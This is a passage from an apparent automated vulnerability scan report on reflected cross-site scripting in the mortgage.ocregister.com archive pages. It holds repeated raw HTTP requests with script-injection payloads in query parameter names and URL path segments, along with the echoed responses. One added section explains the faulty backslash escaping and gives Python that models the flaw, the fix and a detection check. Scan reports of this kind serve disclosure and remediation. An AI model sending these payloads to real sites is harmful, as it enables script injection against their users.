<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05f9e2f\"><script>alert(1)</script>c8e7e3442e9/feed/" /> ...[SNIP]...
1.296. http://mortgage.ocregister.com/2009/05/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2009/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d00"><script>alert(1)</script>437786ed55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91d00\"><script>alert(1)</script>437786ed55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/05/?91d00"><script>alert(1)</script>437786ed55=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 112123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/05/?91d00\"><script>alert(1)</script>437786ed55=1feed/" /> ...[SNIP]...
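Every finding in this section is the same sink: whatever the request URI contains is copied into the href of the feed `<link rel="alternate" type="application/rss+xml">` element, with a backslash placed before the double quote (the `\"` visible in each echoed payload). That is PHP addslashes()/magic_quotes-style escaping, and it does nothing in an HTML attribute: a browser does not treat backslash as an escape character there, so the quote still closes the attribute, `>` closes the tag, and the `<script>` element that follows is parsed and executed. One fix in the template that emits that link covers every monthly archive listed here. The Python below is an added example, not code from the report or from the site: it models the observed output, shows the attribute-encoding fix (the equivalent of htmlspecialchars with ENT_QUOTES in PHP), and runs the three injection points reported per archive page (parameter name, REST URL parameter 1, REST URL parameter 2) through an HTML tokenizer to decide whether a script tag was injected. The template text, the addslashes reimplementation, the canary value and the probe URIs are assumptions reconstructed from the request/response pairs above.

```python
"""Model of the feed-link reflection seen in these findings and of its fix.

Added example; the template, addslashes() reimplementation, canary and
probe URIs are assumptions built from the request/response pairs in the
report, not the site's own code.
"""
import html
from collections.abc import Callable
from html.parser import HTMLParser

HOST = "http://mortgage.ocregister.com"
# Constructed probe with the same shape as the scanner's payloads.
CANARY = 'c0ffee"><script>alert(1)</script>deadbeef'


def addslashes(s: str) -> str:
    """PHP addslashes()/magic_quotes_gpc: backslash before \\ ' " and NUL.

    This reproduces the  \\"  seen in the responses.  Inside an HTML
    attribute a backslash is an ordinary character, so the quote that
    follows it still terminates the attribute value.
    """
    out = []
    for ch in s:
        if ch in "\\'\"":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def feed_link_vulnerable(request_uri: str) -> str:
    """Model of the observed behaviour: the URI is only backslash-escaped."""
    return (f'<link rel="alternate" type="application/rss+xml" '
            f'title="Mortgage Insider" href="{HOST}{addslashes(request_uri)}feed/" />')


def feed_link_fixed(request_uri: str) -> str:
    """Attribute-encode the URI (PHP: htmlspecialchars($uri, ENT_QUOTES, 'UTF-8')).

    " becomes &quot; and < becomes &lt;, so the value can neither close the
    attribute nor open a new tag.
    """
    return (f'<link rel="alternate" type="application/rss+xml" '
            f'title="Mortgage Insider" href="{HOST}{html.escape(request_uri, quote=True)}feed/" />')


class _StartTags(HTMLParser):
    """Collects start-tag names the way a browser tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.names.append(tag)


def script_injected(markup: str) -> bool:
    """True if tokenizing the markup yields a <script> start tag."""
    parser = _StartTags()
    parser.feed(markup)
    parser.close()
    return "script" in parser.names


# The three injection points reported for each monthly archive page.
PROBES = {
    "param name": f"/2009/05/?{CANARY}=1",
    "REST param 1": f"/2009{CANARY}/06/",
    "REST param 2": f"/2009/06{CANARY}/",
}


def probe(render: Callable[[str], str]) -> dict[str, bool]:
    """Render each probe URI; True means the reflection is exploitable."""
    return {name: script_injected(render(uri)) for name, uri in PROBES.items()}


if __name__ == "__main__":
    for label, render in (("vulnerable", feed_link_vulnerable), ("fixed", feed_link_fixed)):
        print(label, probe(render))
```

The tokenizer check is what distinguishes a reflection that merely contains the payload from one that breaks out of the attribute: the vulnerable renderer produces `href="...c0ffee\"><script>...` and the parser reports a script start tag, while the fixed renderer produces `...c0ffee&quot;&gt;&lt;script&gt;...` and the parser sees only the link element.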
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c15"><script>alert(1)</script>ad967443caf was submitted in the REST URL parameter 1. This input was echoed as c9c15\"><script>alert(1)</script>ad967443caf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009c9c15"><script>alert(1)</script>ad967443caf/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009c9c15\"><script>alert(1)</script>ad967443caf/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a462c"><script>alert(1)</script>df7a2d0b05a was submitted in the REST URL parameter 2. This input was echoed as a462c\"><script>alert(1)</script>df7a2d0b05a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06a462c"><script>alert(1)</script>df7a2d0b05a/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06a462c\"><script>alert(1)</script>df7a2d0b05a/feed/" /> ...[SNIP]...
1.299. http://mortgage.ocregister.com/2009/06/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80c8f"><script>alert(1)</script>e0e37e5be57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80c8f\"><script>alert(1)</script>e0e37e5be57 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/06/?80c8f"><script>alert(1)</script>e0e37e5be57=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 114372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/06/?80c8f\"><script>alert(1)</script>e0e37e5be57=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7881c"><script>alert(1)</script>3c2f217435e was submitted in the REST URL parameter 1. This input was echoed as 7881c\"><script>alert(1)</script>3c2f217435e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20097881c"><script>alert(1)</script>3c2f217435e/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:19 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20097881c\"><script>alert(1)</script>3c2f217435e/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4782"><script>alert(1)</script>6666c9a16c7 was submitted in the REST URL parameter 2. This input was echoed as b4782\"><script>alert(1)</script>6666c9a16c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/07b4782"><script>alert(1)</script>6666c9a16c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07b4782\"><script>alert(1)</script>6666c9a16c7/feed/" /> ...[SNIP]...
1.302. http://mortgage.ocregister.com/2009/07/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a46b7"><script>alert(1)</script>653aab2ba5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a46b7\"><script>alert(1)</script>653aab2ba5c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/07/?a46b7"><script>alert(1)</script>653aab2ba5c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 113888
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/07/?a46b7\"><script>alert(1)</script>653aab2ba5c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e95c"><script>alert(1)</script>65109d80feb was submitted in the REST URL parameter 1. This input was echoed as 2e95c\"><script>alert(1)</script>65109d80feb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20092e95c"><script>alert(1)</script>65109d80feb/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20092e95c\"><script>alert(1)</script>65109d80feb/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f3f"><script>alert(1)</script>c6967a59290 was submitted in the REST URL parameter 2. This input was echoed as 41f3f\"><script>alert(1)</script>c6967a59290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0841f3f"><script>alert(1)</script>c6967a59290/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:38 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0841f3f\"><script>alert(1)</script>c6967a59290/feed/" /> ...[SNIP]...
1.305. http://mortgage.ocregister.com/2009/08/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91a1e"><script>alert(1)</script>468ca413bb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91a1e\"><script>alert(1)</script>468ca413bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/08/?91a1e"><script>alert(1)</script>468ca413bb4=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 109320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/08/?91a1e\"><script>alert(1)</script>468ca413bb4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e4e9"><script>alert(1)</script>62c20fd5f6c was submitted in the REST URL parameter 1. This input was echoed as 3e4e9\"><script>alert(1)</script>62c20fd5f6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20093e4e9"><script>alert(1)</script>62c20fd5f6c/09/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20093e4e9\"><script>alert(1)</script>62c20fd5f6c/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43615"><script>alert(1)</script>66b5d481b5d was submitted in the REST URL parameter 2. This input was echoed as 43615\"><script>alert(1)</script>66b5d481b5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/0943615"><script>alert(1)</script>66b5d481b5d/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:13:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:13:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62651
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/0943615\"><script>alert(1)</script>66b5d481b5d/feed/" /> ...[SNIP]...
1.308. http://mortgage.ocregister.com/2009/09/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2009/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fef8a"><script>alert(1)</script>5f63aeef702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fef8a\"><script>alert(1)</script>5f63aeef702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009/09/?fef8a"><script>alert(1)</script>5f63aeef702=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:13:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 97531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2009 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2009/09/?fef8a\"><script>alert(1)</script>5f63aeef702=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 766d2"><script>alert(1)</script>feecef77490 was submitted in the REST URL parameter 1. This input was echoed as 766d2\"><script>alert(1)</script>feecef77490 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2009766d2"><script>alert(1)</script>feecef77490/10/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
